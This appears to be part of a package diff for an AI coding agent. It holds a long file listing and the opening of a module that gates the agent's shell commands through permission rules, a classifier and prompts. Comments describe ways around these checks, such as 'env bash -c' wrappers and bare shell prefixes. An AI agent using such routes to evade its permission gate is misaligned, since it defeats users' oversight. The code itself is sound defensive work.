  1555. package/src/utils/hooks/hooksConfigManager.ts +400 -0
  1556. package/src/utils/hooks/hooksConfigSnapshot.ts +133 -0
  1557. package/src/utils/hooks/hooksSettings.ts +271 -0
  1558. package/src/utils/hooks/postSamplingHooks.ts +70 -0
  1559. package/src/utils/hooks/registerFrontmatterHooks.ts +67 -0
  1560. package/src/utils/hooks/registerSkillHooks.ts +64 -0
  1561. package/src/utils/hooks/sessionHooks.ts +447 -0
  1562. package/src/utils/hooks/skillImprovement.ts +267 -0
  1563. package/src/utils/hooks/ssrfGuard.ts +294 -0
  1564. package/src/utils/hooks.ts +5022 -0
  1565. package/src/utils/horizontalScroll.ts +137 -0
  1566. package/src/utils/http.ts +136 -0
  1567. package/src/utils/hyperlink.ts +39 -0
  1568. package/src/utils/iTermBackup.ts +73 -0
  1569. package/src/utils/ide.ts +1494 -0
  1570. package/src/utils/idePathConversion.ts +90 -0
  1571. package/src/utils/idleTimeout.ts +53 -0
  1572. package/src/utils/imagePaste.ts +416 -0
  1573. package/src/utils/imageResizer.ts +880 -0
  1574. package/src/utils/imageStore.ts +167 -0
  1575. package/src/utils/imageValidation.ts +104 -0
  1576. package/src/utils/immediateCommand.ts +15 -0
  1577. package/src/utils/inProcessTeammateHelpers.ts +102 -0
  1578. package/src/utils/ink.ts +26 -0
  1579. package/src/utils/intl.ts +94 -0
  1580. package/src/utils/jetbrains.ts +191 -0
  1581. package/src/utils/json.ts +277 -0
  1582. package/src/utils/jsonRead.ts +16 -0
  1583. package/src/utils/keyboardShortcuts.ts +14 -0
  1584. package/src/utils/lazySchema.ts +8 -0
  1585. package/src/utils/listSessionsImpl.ts +454 -0
  1586. package/src/utils/localInstaller.ts +162 -0
  1587. package/src/utils/lockfile.ts +43 -0
  1588. package/src/utils/log.ts +362 -0
  1589. package/src/utils/logoV2Utils.ts +350 -0
  1590. package/src/utils/mailbox.ts +73 -0
  1591. package/src/utils/managedEnv.ts +199 -0
  1592. package/src/utils/managedEnvConstants.ts +191 -0
  1593. package/src/utils/markdown.ts +381 -0
  1594. package/src/utils/markdownConfigLoader.ts +600 -0
  1595. package/src/utils/mcp/dateTimeParser.ts +121 -0
  1596. package/src/utils/mcp/elicitationValidation.ts +336 -0
  1597. package/src/utils/mcpInstructionsDelta.ts +130 -0
  1598. package/src/utils/mcpOutputStorage.ts +189 -0
  1599. package/src/utils/mcpValidation.ts +208 -0
  1600. package/src/utils/mcpWebSocketTransport.ts +200 -0
  1601. package/src/utils/memoize.ts +269 -0
  1602. package/src/utils/memory/types.ts +12 -0
  1603. package/src/utils/memory/versions.ts +8 -0
  1604. package/src/utils/memoryFileDetection.ts +289 -0
  1605. package/src/utils/messagePredicates.ts +8 -0
  1606. package/src/utils/messageQueueManager.ts +547 -0
  1607. package/src/utils/messages/mappers.ts +290 -0
  1608. package/src/utils/messages/systemInit.ts +96 -0
  1609. package/src/utils/messages.ts +5512 -0
  1610. package/src/utils/model/agent.ts +157 -0
  1611. package/src/utils/model/aliases.ts +25 -0
  1612. package/src/utils/model/antModels.ts +64 -0
  1613. package/src/utils/model/bedrock.ts +265 -0
  1614. package/src/utils/model/check1mAccess.ts +72 -0
  1615. package/src/utils/model/configs.ts +118 -0
  1616. package/src/utils/model/contextWindowUpgradeCheck.ts +47 -0
  1617. package/src/utils/model/deprecation.ts +101 -0
  1618. package/src/utils/model/model.ts +634 -0
  1619. package/src/utils/model/modelAllowlist.ts +170 -0
  1620. package/src/utils/model/modelCapabilities.ts +118 -0
  1621. package/src/utils/model/modelOptions.ts +540 -0
  1622. package/src/utils/model/modelStrings.ts +166 -0
  1623. package/src/utils/model/modelSupportOverrides.ts +50 -0
  1624. package/src/utils/model/providers.ts +46 -0
  1625. package/src/utils/model/validateModel.ts +159 -0
  1626. package/src/utils/modelCost.ts +235 -0
  1627. package/src/utils/modifiers.ts +36 -0
  1628. package/src/utils/mtls.ts +179 -0
  1629. package/src/utils/nativeInstaller/download.ts +523 -0
  1630. package/src/utils/nativeInstaller/index.ts +18 -0
  1631. package/src/utils/nativeInstaller/installer.ts +1708 -0
  1632. package/src/utils/nativeInstaller/packageManagers.ts +336 -0
  1633. package/src/utils/nativeInstaller/pidLock.ts +433 -0
  1634. package/src/utils/notebook.ts +224 -0
  1635. package/src/utils/objectGroupBy.ts +18 -0
  1636. package/src/utils/pasteStore.ts +104 -0
  1637. package/src/utils/path.ts +155 -0
  1638. package/src/utils/pdf.ts +300 -0
  1639. package/src/utils/pdfUtils.ts +70 -0
  1640. package/src/utils/peerAddress.ts +21 -0
  1641. package/src/utils/permissions/PermissionMode.ts +141 -0
  1642. package/src/utils/permissions/PermissionPromptToolResultSchema.ts +127 -0
  1643. package/src/utils/permissions/PermissionResult.ts +35 -0
  1644. package/src/utils/permissions/PermissionRule.ts +40 -0
  1645. package/src/utils/permissions/PermissionUpdate.ts +389 -0
  1646. package/src/utils/permissions/PermissionUpdateSchema.ts +78 -0
  1647. package/src/utils/permissions/autoModeState.ts +39 -0
  1648. package/src/utils/permissions/bashClassifier.ts +61 -0
  1649. package/src/utils/permissions/bypassPermissionsKillswitch.ts +155 -0
  1650. package/src/utils/permissions/classifierDecision.ts +98 -0
  1651. package/src/utils/permissions/classifierShared.ts +39 -0
  1652. package/src/utils/permissions/dangerousPatterns.ts +80 -0
  1653. package/src/utils/permissions/denialTracking.ts +45 -0
  1654. package/src/utils/permissions/filesystem.ts +1777 -0
  1655. package/src/utils/permissions/getNextPermissionMode.ts +101 -0
  1656. package/src/utils/permissions/pathValidation.ts +485 -0
  1657. package/src/utils/permissions/permissionExplainer.ts +250 -0
  1658. package/src/utils/permissions/permissionRuleParser.ts +198 -0
  1659. package/src/utils/permissions/permissionSetup.ts +1532 -0
  1660. package/src/utils/permissions/permissions.ts +1486 -0
  1661. package/src/utils/permissions/permissionsLoader.ts +296 -0
  1662. package/src/utils/permissions/shadowedRuleDetection.ts +234 -0
  1663. package/src/utils/permissions/shellRuleMatching.ts +228 -0
  1664. package/src/utils/permissions/yoloClassifier.ts +1495 -0
  1665. package/src/utils/planModeV2.ts +95 -0
  1666. package/src/utils/plans.ts +397 -0
  1667. package/src/utils/platform.ts +150 -0
  1668. package/src/utils/plugins/addDirPluginSettings.ts +71 -0
  1669. package/src/utils/plugins/cacheUtils.ts +196 -0
  1670. package/src/utils/plugins/dependencyResolver.ts +305 -0
  1671. package/src/utils/plugins/fetchTelemetry.ts +135 -0
  1672. package/src/utils/plugins/gitAvailability.ts +69 -0
  1673. package/src/utils/plugins/headlessPluginInstall.ts +174 -0
  1674. package/src/utils/plugins/hintRecommendation.ts +164 -0
  1675. package/src/utils/plugins/installCounts.ts +292 -0
  1676. package/src/utils/plugins/installedPluginsManager.ts +1268 -0
  1677. package/src/utils/plugins/loadPluginAgents.ts +348 -0
  1678. package/src/utils/plugins/loadPluginCommands.ts +946 -0
  1679. package/src/utils/plugins/loadPluginHooks.ts +287 -0
  1680. package/src/utils/plugins/loadPluginOutputStyles.ts +178 -0
  1681. package/src/utils/plugins/lspPluginIntegration.ts +387 -0
  1682. package/src/utils/plugins/lspRecommendation.ts +374 -0
  1683. package/src/utils/plugins/managedPlugins.ts +27 -0
  1684. package/src/utils/plugins/marketplaceHelpers.ts +592 -0
  1685. package/src/utils/plugins/marketplaceManager.ts +2643 -0
  1686. package/src/utils/plugins/mcpPluginIntegration.ts +634 -0
  1687. package/src/utils/plugins/mcpbHandler.ts +968 -0
  1688. package/src/utils/plugins/officialMarketplace.ts +25 -0
  1689. package/src/utils/plugins/officialMarketplaceGcs.ts +216 -0
  1690. package/src/utils/plugins/officialMarketplaceStartupCheck.ts +439 -0
  1691. package/src/utils/plugins/orphanedPluginFilter.ts +114 -0
  1692. package/src/utils/plugins/parseMarketplaceInput.ts +162 -0
  1693. package/src/utils/plugins/performStartupChecks.tsx +70 -0
  1694. package/src/utils/plugins/pluginAutoupdate.ts +284 -0
  1695. package/src/utils/plugins/pluginBlocklist.ts +127 -0
  1696. package/src/utils/plugins/pluginDirectories.ts +178 -0
  1697. package/src/utils/plugins/pluginFlagging.ts +208 -0
  1698. package/src/utils/plugins/pluginIdentifier.ts +123 -0
  1699. package/src/utils/plugins/pluginInstallationHelpers.ts +595 -0
  1700. package/src/utils/plugins/pluginLoader.ts +3302 -0
  1701. package/src/utils/plugins/pluginOptionsStorage.ts +400 -0
  1702. package/src/utils/plugins/pluginPolicy.ts +20 -0
  1703. package/src/utils/plugins/pluginStartupCheck.ts +341 -0
  1704. package/src/utils/plugins/pluginVersioning.ts +157 -0
  1705. package/src/utils/plugins/reconciler.ts +265 -0
  1706. package/src/utils/plugins/refresh.ts +215 -0
  1707. package/src/utils/plugins/schemas.ts +1681 -0
  1708. package/src/utils/plugins/validatePlugin.ts +903 -0
  1709. package/src/utils/plugins/walkPluginMarkdown.ts +69 -0
  1710. package/src/utils/plugins/zipCache.ts +406 -0
  1711. package/src/utils/plugins/zipCacheAdapters.ts +164 -0
  1712. package/src/utils/powershell/dangerousCmdlets.ts +185 -0
  1713. package/src/utils/powershell/parser.ts +1804 -0
  1714. package/src/utils/powershell/staticPrefix.ts +316 -0
  1715. package/src/utils/preflightChecks.tsx +151 -0
  1716. package/src/utils/privacyLevel.ts +55 -0
  1717. package/src/utils/process.ts +68 -0
  1718. package/src/utils/processUserInput/processBashCommand.tsx +140 -0
  1719. package/src/utils/processUserInput/processSlashCommand.tsx +922 -0
  1720. package/src/utils/processUserInput/processTextPrompt.ts +100 -0
  1721. package/src/utils/processUserInput/processUserInput.ts +605 -0
  1722. package/src/utils/profilerBase.ts +46 -0
  1723. package/src/utils/promptCategory.ts +49 -0
  1724. package/src/utils/promptEditor.ts +188 -0
  1725. package/src/utils/promptShellExecution.ts +183 -0
  1726. package/src/utils/proxy.ts +426 -0
  1727. package/src/utils/queryContext.ts +179 -0
  1728. package/src/utils/queryHelpers.ts +552 -0
  1729. package/src/utils/queryProfiler.ts +301 -0
  1730. package/src/utils/queueProcessor.ts +95 -0
  1731. package/src/utils/readEditContext.ts +227 -0
  1732. package/src/utils/readFileInRange.ts +383 -0
  1733. package/src/utils/releaseNotes.ts +360 -0
  1734. package/src/utils/renderOptions.ts +77 -0
  1735. package/src/utils/ripgrep.ts +679 -0
  1736. package/src/utils/sandbox/sandbox-adapter.ts +985 -0
  1737. package/src/utils/sandbox/sandbox-ui-utils.ts +12 -0
  1738. package/src/utils/sanitization.ts +91 -0
  1739. package/src/utils/screenshotClipboard.ts +121 -0
  1740. package/src/utils/sdkEventQueue.ts +134 -0
  1741. package/src/utils/secureStorage/fallbackStorage.ts +70 -0
  1742. package/src/utils/secureStorage/index.ts +17 -0
  1743. package/src/utils/secureStorage/keychainPrefetch.ts +116 -0
  1744. package/src/utils/secureStorage/macOsKeychainHelpers.ts +111 -0
  1745. package/src/utils/secureStorage/macOsKeychainStorage.ts +231 -0
  1746. package/src/utils/secureStorage/plainTextStorage.ts +84 -0
  1747. package/src/utils/semanticBoolean.ts +29 -0
  1748. package/src/utils/semanticNumber.ts +36 -0
  1749. package/src/utils/semver.ts +59 -0
  1750. package/src/utils/sequential.ts +56 -0
  1751. package/src/utils/sessionActivity.ts +133 -0
  1752. package/src/utils/sessionEnvVars.ts +22 -0
  1753. package/src/utils/sessionEnvironment.ts +166 -0
  1754. package/src/utils/sessionFileAccessHooks.ts +250 -0
  1755. package/src/utils/sessionIngressAuth.ts +140 -0
  1756. package/src/utils/sessionRestore.ts +551 -0
  1757. package/src/utils/sessionStart.ts +232 -0
  1758. package/src/utils/sessionState.ts +150 -0
  1759. package/src/utils/sessionStorage.ts +5105 -0
  1760. package/src/utils/sessionStoragePortable.ts +793 -0
  1761. package/src/utils/sessionTitle.ts +129 -0
  1762. package/src/utils/sessionUrl.ts +64 -0
  1763. package/src/utils/set.ts +53 -0
  1764. package/src/utils/settings/allErrors.ts +32 -0
  1765. package/src/utils/settings/applySettingsChange.ts +92 -0
  1766. package/src/utils/settings/changeDetector.ts +488 -0
  1767. package/src/utils/settings/constants.ts +202 -0
  1768. package/src/utils/settings/internalWrites.ts +37 -0
  1769. package/src/utils/settings/managedPath.ts +34 -0
  1770. package/src/utils/settings/mdm/constants.ts +81 -0
  1771. package/src/utils/settings/mdm/rawRead.ts +130 -0
  1772. package/src/utils/settings/mdm/settings.ts +316 -0
  1773. package/src/utils/settings/permissionValidation.ts +262 -0
  1774. package/src/utils/settings/pluginOnlyPolicy.ts +60 -0
  1775. package/src/utils/settings/schemaOutput.ts +8 -0
  1776. package/src/utils/settings/settings.ts +1015 -0
  1777. package/src/utils/settings/settingsCache.ts +80 -0
  1778. package/src/utils/settings/toolValidationConfig.ts +103 -0
  1779. package/src/utils/settings/types.ts +1148 -0
  1780. package/src/utils/settings/validateEditTool.ts +45 -0
  1781. package/src/utils/settings/validation.ts +265 -0
  1782. package/src/utils/settings/validationTips.ts +164 -0
  1783. package/src/utils/shell/bashProvider.ts +255 -0
  1784. package/src/utils/shell/outputLimits.ts +14 -0
  1785. package/src/utils/shell/powershellDetection.ts +107 -0
  1786. package/src/utils/shell/powershellProvider.ts +123 -0
  1787. package/src/utils/shell/prefix.ts +367 -0
  1788. package/src/utils/shell/readOnlyCommandValidation.ts +1893 -0
  1789. package/src/utils/shell/resolveDefaultShell.ts +14 -0
  1790. package/src/utils/shell/shellProvider.ts +33 -0
  1791. package/src/utils/shell/shellToolUtils.ts +22 -0
  1792. package/src/utils/shell/specPrefix.ts +241 -0
  1793. package/src/utils/shellConfig.ts +167 -0
  1794. package/src/utils/sideQuery.ts +222 -0
  1795. package/src/utils/sideQuestion.ts +155 -0
  1796. package/src/utils/signal.ts +43 -0
  1797. package/src/utils/sinks.ts +16 -0
  1798. package/src/utils/skills/skillChangeDetector.ts +311 -0
  1799. package/src/utils/slashCommandParsing.ts +60 -0
  1800. package/src/utils/sleep.ts +84 -0
  1801. package/src/utils/sliceAnsi.ts +91 -0
  1802. package/src/utils/slowOperations.ts +286 -0
  1803. package/src/utils/standaloneAgent.ts +23 -0
  1804. package/src/utils/startupProfiler.ts +194 -0
  1805. package/src/utils/staticRender.tsx +116 -0
  1806. package/src/utils/stats.ts +1061 -0
  1807. package/src/utils/statsCache.ts +434 -0
  1808. package/src/utils/status.tsx +362 -0
  1809. package/src/utils/statusNoticeDefinitions.tsx +198 -0
  1810. package/src/utils/statusNoticeHelpers.ts +20 -0
  1811. package/src/utils/stream.ts +76 -0
  1812. package/src/utils/streamJsonStdoutGuard.ts +123 -0
  1813. package/src/utils/streamlinedTransform.ts +201 -0
  1814. package/src/utils/stringUtils.ts +235 -0
  1815. package/src/utils/subprocessEnv.ts +99 -0
  1816. package/src/utils/suggestions/commandSuggestions.ts +567 -0
  1817. package/src/utils/suggestions/directoryCompletion.ts +263 -0
  1818. package/src/utils/suggestions/shellHistoryCompletion.ts +119 -0
  1819. package/src/utils/suggestions/skillUsageTracking.ts +55 -0
  1820. package/src/utils/suggestions/slackChannelSuggestions.ts +209 -0
  1821. package/src/utils/swarm/It2SetupPrompt.tsx +380 -0
  1822. package/src/utils/swarm/backends/ITermBackend.ts +370 -0
  1823. package/src/utils/swarm/backends/InProcessBackend.ts +339 -0
  1824. package/src/utils/swarm/backends/PaneBackendExecutor.ts +354 -0
  1825. package/src/utils/swarm/backends/TmuxBackend.ts +764 -0
  1826. package/src/utils/swarm/backends/detection.ts +128 -0
  1827. package/src/utils/swarm/backends/it2Setup.ts +245 -0
  1828. package/src/utils/swarm/backends/registry.ts +464 -0
  1829. package/src/utils/swarm/backends/teammateModeSnapshot.ts +87 -0
  1830. package/src/utils/swarm/backends/types.ts +311 -0
  1831. package/src/utils/swarm/constants.ts +33 -0
  1832. package/src/utils/swarm/inProcessRunner.ts +1552 -0
  1833. package/src/utils/swarm/leaderPermissionBridge.ts +54 -0
  1834. package/src/utils/swarm/permissionSync.ts +928 -0
  1835. package/src/utils/swarm/reconnection.ts +119 -0
  1836. package/src/utils/swarm/spawnInProcess.ts +328 -0
  1837. package/src/utils/swarm/spawnUtils.ts +146 -0
  1838. package/src/utils/swarm/teamHelpers.ts +683 -0
  1839. package/src/utils/swarm/teammateInit.ts +129 -0
  1840. package/src/utils/swarm/teammateLayoutManager.ts +107 -0
  1841. package/src/utils/swarm/teammateModel.ts +10 -0
  1842. package/src/utils/swarm/teammatePromptAddendum.ts +18 -0
  1843. package/src/utils/systemDirectories.ts +74 -0
  1844. package/src/utils/systemPrompt.ts +123 -0
  1845. package/src/utils/systemPromptType.ts +14 -0
  1846. package/src/utils/systemTheme.ts +119 -0
  1847. package/src/utils/taggedId.ts +54 -0
  1848. package/src/utils/task/TaskOutput.ts +390 -0
  1849. package/src/utils/task/diskOutput.ts +451 -0
  1850. package/src/utils/task/framework.ts +308 -0
  1851. package/src/utils/task/outputFormatting.ts +38 -0
  1852. package/src/utils/task/sdkProgress.ts +36 -0
  1853. package/src/utils/tasks.ts +862 -0
  1854. package/src/utils/teamDiscovery.ts +81 -0
  1855. package/src/utils/teamMemoryOps.ts +88 -0
  1856. package/src/utils/teammate.ts +292 -0
  1857. package/src/utils/teammateContext.ts +96 -0
  1858. package/src/utils/teammateMailbox.ts +1183 -0
  1859. package/src/utils/telemetry/betaSessionTracing.ts +491 -0
  1860. package/src/utils/telemetry/bigqueryExporter.ts +252 -0
  1861. package/src/utils/telemetry/events.ts +75 -0
  1862. package/src/utils/telemetry/instrumentation.ts +825 -0
  1863. package/src/utils/telemetry/logger.ts +26 -0
  1864. package/src/utils/telemetry/perfettoTracing.ts +1120 -0
  1865. package/src/utils/telemetry/pluginTelemetry.ts +289 -0
  1866. package/src/utils/telemetry/sessionTracing.ts +927 -0
  1867. package/src/utils/telemetry/skillLoadedEvent.ts +39 -0
  1868. package/src/utils/telemetryAttributes.ts +71 -0
  1869. package/src/utils/teleport/api.ts +466 -0
  1870. package/src/utils/teleport/environmentSelection.ts +77 -0
  1871. package/src/utils/teleport/environments.ts +120 -0
  1872. package/src/utils/teleport/gitBundle.ts +292 -0
  1873. package/src/utils/teleport.tsx +1226 -0
  1874. package/src/utils/tempfile.ts +31 -0
  1875. package/src/utils/terminal.ts +131 -0
  1876. package/src/utils/terminalPanel.ts +191 -0
  1877. package/src/utils/textHighlighting.ts +166 -0
  1878. package/src/utils/theme.ts +639 -0
  1879. package/src/utils/thinking.ts +162 -0
  1880. package/src/utils/timeouts.ts +39 -0
  1881. package/src/utils/tmuxSocket.ts +427 -0
  1882. package/src/utils/todo/types.ts +18 -0
  1883. package/src/utils/tokenBudget.ts +73 -0
  1884. package/src/utils/tokens.ts +261 -0
  1885. package/src/utils/toolErrors.ts +132 -0
  1886. package/src/utils/toolPool.ts +79 -0
  1887. package/src/utils/toolResultStorage.ts +1040 -0
  1888. package/src/utils/toolSchemaCache.ts +26 -0
  1889. package/src/utils/toolSearch.ts +756 -0
  1890. package/src/utils/transcriptSearch.ts +202 -0
  1891. package/src/utils/treeify.ts +170 -0
  1892. package/src/utils/truncate.ts +179 -0
  1893. package/src/utils/ultraplan/ccrSession.ts +349 -0
  1894. package/src/utils/ultraplan/keyword.ts +127 -0
  1895. package/src/utils/ultraplan/prompt.txt +1 -0
  1896. package/src/utils/unaryLogging.ts +39 -0
  1897. package/src/utils/undercover.ts +89 -0
  1898. package/src/utils/user.ts +194 -0
  1899. package/src/utils/userAgent.ts +10 -0
  1900. package/src/utils/userPromptKeywords.ts +27 -0
  1901. package/src/utils/uuid.ts +27 -0
  1902. package/src/utils/warningHandler.ts +121 -0
  1903. package/src/utils/which.ts +82 -0
  1904. package/src/utils/windowsPaths.ts +173 -0
  1905. package/src/utils/withResolvers.ts +13 -0
  1906. package/src/utils/words.ts +800 -0
  1907. package/src/utils/workloadContext.ts +57 -0
  1908. package/src/utils/worktree.ts +1519 -0
  1909. package/src/utils/worktreeModeEnabled.ts +11 -0
  1910. package/src/utils/xdg.ts +65 -0
  1911. package/src/utils/xml.ts +16 -0
  1912. package/src/utils/yaml.ts +15 -0
  1913. package/src/utils/zodToJsonSchema.ts +23 -0
  1914. package/src/vim/motions.ts +82 -0
  1915. package/src/vim/operators.ts +556 -0
  1916. package/src/vim/textObjects.ts +186 -0
  1917. package/src/vim/transitions.ts +490 -0
  1918. package/src/vim/types.ts +199 -0
  1919. package/src/voice/voiceModeEnabled.ts +54 -0
  1920. package/start.js +1 -0
@@ -0,0 +1,2621 @@
1
+ import { feature } from 'bun:bundle'
2
+ import { APIUserAbortError } from '@anthropic-ai/sdk'
3
+ import type { z } from 'zod/v4'
4
+ import { getFeatureValue_CACHED_MAY_BE_STALE } from '../../services/analytics/growthbook.js'
5
+ import {
6
+ type AnalyticsMetadata_I_VERIFIED_THIS_IS_NOT_CODE_OR_FILEPATHS,
7
+ logEvent,
8
+ } from '../../services/analytics/index.js'
9
+ import type { ToolPermissionContext, ToolUseContext } from '../../Tool.js'
10
+ import type { PendingClassifierCheck } from '../../types/permissions.js'
11
+ import { count } from '../../utils/array.js'
12
+ import {
13
+ checkSemantics,
14
+ nodeTypeId,
15
+ type ParseForSecurityResult,
16
+ parseForSecurityFromAst,
17
+ type Redirect,
18
+ type SimpleCommand,
19
+ } from '../../utils/bash/ast.js'
20
+ import {
21
+ type CommandPrefixResult,
22
+ extractOutputRedirections,
23
+ getCommandSubcommandPrefix,
24
+ splitCommand_DEPRECATED,
25
+ } from '../../utils/bash/commands.js'
26
+ import { parseCommandRaw } from '../../utils/bash/parser.js'
27
+ import { tryParseShellCommand } from '../../utils/bash/shellQuote.js'
28
+ import { getCwd } from '../../utils/cwd.js'
29
+ import { logForDebugging } from '../../utils/debug.js'
30
+ import { isEnvTruthy } from '../../utils/envUtils.js'
31
+ import { AbortError } from '../../utils/errors.js'
32
+ import type {
33
+ ClassifierBehavior,
34
+ ClassifierResult,
35
+ } from '../../utils/permissions/bashClassifier.js'
36
+ import {
37
+ classifyBashCommand,
38
+ getBashPromptAllowDescriptions,
39
+ getBashPromptAskDescriptions,
40
+ getBashPromptDenyDescriptions,
41
+ isClassifierPermissionsEnabled,
42
+ } from '../../utils/permissions/bashClassifier.js'
43
+ import type {
44
+ PermissionDecisionReason,
45
+ PermissionResult,
46
+ } from '../../utils/permissions/PermissionResult.js'
47
+ import type {
48
+ PermissionRule,
49
+ PermissionRuleValue,
50
+ } from '../../utils/permissions/PermissionRule.js'
51
+ import { extractRules } from '../../utils/permissions/PermissionUpdate.js'
52
+ import type { PermissionUpdate } from '../../utils/permissions/PermissionUpdateSchema.js'
53
+ import { permissionRuleValueToString } from '../../utils/permissions/permissionRuleParser.js'
54
+ import {
55
+ createPermissionRequestMessage,
56
+ getRuleByContentsForTool,
57
+ } from '../../utils/permissions/permissions.js'
58
+ import {
59
+ parsePermissionRule,
60
+ type ShellPermissionRule,
61
+ matchWildcardPattern as sharedMatchWildcardPattern,
62
+ permissionRuleExtractPrefix as sharedPermissionRuleExtractPrefix,
63
+ suggestionForExactCommand as sharedSuggestionForExactCommand,
64
+ suggestionForPrefix as sharedSuggestionForPrefix,
65
+ } from '../../utils/permissions/shellRuleMatching.js'
66
+ import { getPlatform } from '../../utils/platform.js'
67
+ import { SandboxManager } from '../../utils/sandbox/sandbox-adapter.js'
68
+ import { jsonStringify } from '../../utils/slowOperations.js'
69
+ import { windowsPathToPosixPath } from '../../utils/windowsPaths.js'
70
+ import { BashTool } from './BashTool.js'
71
+ import { checkCommandOperatorPermissions } from './bashCommandHelpers.js'
72
+ import {
73
+ bashCommandIsSafeAsync_DEPRECATED,
74
+ stripSafeHeredocSubstitutions,
75
+ } from './bashSecurity.js'
76
+ import { checkPermissionMode } from './modeValidation.js'
77
+ import { checkPathConstraints } from './pathValidation.js'
78
+ import { checkSedConstraints } from './sedValidation.js'
79
+ import { shouldUseSandbox } from './shouldUseSandbox.js'
80
+
81
+ // DCE cliff: Bun's feature() evaluator has a per-function complexity budget.
82
+ // bashToolHasPermission is right at the limit. `import { X as Y }` aliases
83
+ // inside the import block count toward this budget; when they push it over
84
+ // the threshold Bun can no longer prove feature('BASH_CLASSIFIER') is a
85
+ // constant and silently evaluates the ternaries to `false`, dropping every
86
+ // pendingClassifierCheck spread. Keep aliases as top-level const rebindings
87
+ // instead. (See also the comment on checkSemanticsDeny below.)
88
+ const bashCommandIsSafeAsync = bashCommandIsSafeAsync_DEPRECATED
89
+ const splitCommand = splitCommand_DEPRECATED
90
+
91
+ // Env-var assignment prefix (VAR=value). Shared across three while-loops that
92
+ // skip safe env vars before extracting the command name.
93
+ const ENV_VAR_ASSIGN_RE = /^[A-Za-z_]\w*=/
94
+
95
+ // CC-643: On complex compound commands, splitCommand_DEPRECATED can produce a
96
+ // very large subcommands array (possible exponential growth; #21405's ReDoS fix
97
+ // may have been incomplete). Each subcommand then runs tree-sitter parse +
98
+ // ~20 validators + logEvent (bashSecurity.ts), and with memoized metadata the
99
+ // resulting microtask chain starves the event loop — REPL freeze at 100% CPU,
100
+ // strace showed /proc/self/stat reads at ~127Hz with no epoll_wait. Fifty is
101
+ // generous: legitimate user commands don't split that wide. Above the cap we
102
+ // fall back to 'ask' (safe default — we can't prove safety, so we prompt).
103
+ export const MAX_SUBCOMMANDS_FOR_SECURITY_CHECK = 50
104
+
105
+ // GH#11380: Cap the number of per-subcommand rules suggested for compound
106
+ // commands. Beyond this, the "Yes, and don't ask again for X, Y, Z…" label
107
+ // degrades to "similar commands" anyway, and saving 10+ rules from one prompt
108
+ // is more likely noise than intent. Users chaining this many write commands
109
+ // in one && list are rare; they can always approve once and add rules manually.
110
+ export const MAX_SUGGESTED_RULES_FOR_COMPOUND = 5
111
+
112
+ /**
113
+ * [ANT-ONLY] Log classifier evaluation results for analysis.
114
+ * This helps us understand which classifier rules are being evaluated
115
+ * and how the classifier is deciding on commands.
116
+ */
117
+ function logClassifierResultForAnts(
118
+ command: string,
119
+ behavior: ClassifierBehavior,
120
+ descriptions: string[],
121
+ result: ClassifierResult,
122
+ ): void {
123
+ if (process.env.USER_TYPE !== 'ant') {
124
+ return
125
+ }
126
+
127
+ logEvent('tengu_internal_bash_classifier_result', {
128
+ behavior:
129
+ behavior as AnalyticsMetadata_I_VERIFIED_THIS_IS_NOT_CODE_OR_FILEPATHS,
130
+ descriptions: jsonStringify(
131
+ descriptions,
132
+ ) as AnalyticsMetadata_I_VERIFIED_THIS_IS_NOT_CODE_OR_FILEPATHS,
133
+ matches: result.matches,
134
+ matchedDescription: (result.matchedDescription ??
135
+ '') as AnalyticsMetadata_I_VERIFIED_THIS_IS_NOT_CODE_OR_FILEPATHS,
136
+ confidence:
137
+ result.confidence as AnalyticsMetadata_I_VERIFIED_THIS_IS_NOT_CODE_OR_FILEPATHS,
138
+ reason:
139
+ result.reason as AnalyticsMetadata_I_VERIFIED_THIS_IS_NOT_CODE_OR_FILEPATHS,
140
+ // Note: command contains code/filepaths - this is ANT-ONLY so it's OK
141
+ command:
142
+ command as AnalyticsMetadata_I_VERIFIED_THIS_IS_NOT_CODE_OR_FILEPATHS,
143
+ })
144
+ }
145
+
146
+ /**
147
+ * Extract a stable command prefix (command + subcommand) from a raw command string.
148
+ * Skips leading env var assignments only if they are in SAFE_ENV_VARS (or
149
+ * ANT_ONLY_SAFE_ENV_VARS for ant users). Returns null if a non-safe env var is
150
+ * encountered (to fall back to exact match), or if the second token doesn't look
151
+ * like a subcommand (lowercase alphanumeric, e.g., "commit", "run").
152
+ *
153
+ * Examples:
154
+ * 'git commit -m "fix typo"' → 'git commit'
155
+ * 'NODE_ENV=prod npm run build' → 'npm run' (NODE_ENV is safe)
156
+ * 'MY_VAR=val npm run build' → null (MY_VAR is not safe)
157
+ * 'ls -la' → null (flag, not a subcommand)
158
+ * 'cat file.txt' → null (filename, not a subcommand)
159
+ * 'chmod 755 file' → null (number, not a subcommand)
160
+ */
161
+ export function getSimpleCommandPrefix(command: string): string | null {
162
+ const tokens = command.trim().split(/\s+/).filter(Boolean)
163
+ if (tokens.length === 0) return null
164
+
165
+ // Skip env var assignments (VAR=value) at the start, but only if they are
166
+ // in SAFE_ENV_VARS (or ANT_ONLY_SAFE_ENV_VARS for ant users). If a non-safe
167
+ // env var is encountered, return null to fall back to exact match. This
168
+ // prevents generating prefix rules like Bash(npm run:*) that can never match
169
+ // at allow-rule check time, because stripSafeWrappers only strips safe vars.
170
+ let i = 0
171
+ while (i < tokens.length && ENV_VAR_ASSIGN_RE.test(tokens[i]!)) {
172
+ const varName = tokens[i]!.split('=')[0]!
173
+ const isAntOnlySafe =
174
+ process.env.USER_TYPE === 'ant' && ANT_ONLY_SAFE_ENV_VARS.has(varName)
175
+ if (!SAFE_ENV_VARS.has(varName) && !isAntOnlySafe) {
176
+ return null
177
+ }
178
+ i++
179
+ }
180
+
181
+ const remaining = tokens.slice(i)
182
+ if (remaining.length < 2) return null
183
+ const subcmd = remaining[1]!
184
+ // Second token must look like a subcommand (e.g., "commit", "run", "compose"),
185
+ // not a flag (-rf), filename (file.txt), path (/tmp), URL, or number (755).
186
+ if (!/^[a-z][a-z0-9]*(-[a-z0-9]+)*$/.test(subcmd)) return null
187
+ return remaining.slice(0, 2).join(' ')
188
+ }
189
+
190
+ // Bare-prefix suggestions like `bash:*` or `sh:*` would allow arbitrary code
191
+ // via `-c`. Wrapper suggestions like `env:*` or `sudo:*` would do the same:
192
+ // `env` is NOT in SAFE_WRAPPER_PATTERNS, so `env bash -c "evil"` survives
193
+ // stripSafeWrappers unchanged and hits the startsWith("env ") check at
194
+ // the prefix-rule matcher. Shell list mirrors DANGEROUS_SHELL_PREFIXES in
195
+ // src/utils/shell/prefix.ts which guarded the old Haiku extractor.
196
+ const BARE_SHELL_PREFIXES = new Set([
197
+ 'sh',
198
+ 'bash',
199
+ 'zsh',
200
+ 'fish',
201
